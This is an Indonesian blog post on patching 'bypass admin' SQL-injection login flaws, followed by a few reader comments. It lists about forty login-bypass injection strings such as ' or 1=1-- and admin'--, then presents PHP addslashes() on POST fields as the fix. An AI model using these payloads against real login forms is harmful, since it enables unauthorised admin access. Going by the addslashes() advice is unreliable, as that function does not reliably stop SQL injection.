Patching Bypass Admin Login

”artikel”

Apa Itu Bypass Admin? - Gak jauh beda dan masih berhubungan dengan SQL Injection. Bug ini memungkinkan attacker untuk login sebagai admin hanya dgn memasukkan username dan password tertentu. Tanpa perlu repot - repot meng-exploitasi.

Beberapa variasi injeksi login: 
'=''or'
‘ or 1=1 or ”=’
‘ or 1=1–
‘ or 1=1#
‘ or 1=1/*
' or 1=1
' or '1'='1'
1' or 1=1
1' or '1'='1'
' or 'z'='z
‘) or ’1'=’1–
‘) or (’1'=’1–
” or 1=1–
or 1=1–
‘or 0=0 –
‘or ‘x’='x
‘or a=a-
“or 0=0 –
“or 0=0 #
“or “x”=”x
“)or(“a”=”a
admin’–
hi” or 1=1 –
hi’ or’a'=’a
hi”)or(“a”=”a
or 0=0 #
or a=a–
‘or 0=0 #
‘having 1=1–
“or 1=1–
“or “a”=”a
‘)or(‘a’='a
‘)or(‘x’='x
hi” or “a”=”a
hi’ or 1=1 –
hi’)or(‘a’='a
or 0=0 –
or 1=1–
1'or’1'=’1

Lalu, bagaimana menutup bug tersebut? Saya menutup/menambal bug bypass admin login dengan menggunakan fungsi PHP addslashes(). Fungsi addslashes() sendiri ditambahkan pada php versi ke 4+. Efek yang ditimbulkan saat kita menggunakan fungsi addslashes() pada suatu string adalah menambahkan simbol backslash (\). Fungsinya untuk mencegah attacker memasukan script yang mengandung kutip pada website kita.

Cara menggunakannya, sebagai berikut:

$username = addslashes($_POST['username']);
$password = addslashes($_POST['password']);
Terima kasih, semoga membantu.
Share:

5 komentar:

  1. kan bypass admin rata" query'nya kosong & harus di isi ,, nah jadi saya pernah nemu web, query ga kong tapi pas iseng nyoba bypas tembu ,, nah itu cara ngatasinnya gimana

    BalasHapus
  2. + kalau bypass email cara ngatasinya gimana ?

    BalasHapus
    Balasan
    1. Hmm, boleh nih buat next artikel, wkwk

      Hapus
  3. Kalau bug nya bisa sebagai admin berarti dia memiliki kuasa penuh atas website tersebut ya gan?

    BalasHapus
    Balasan
    1. Yep, jadi kita masuk sebagai si empu nya web.

      Hapus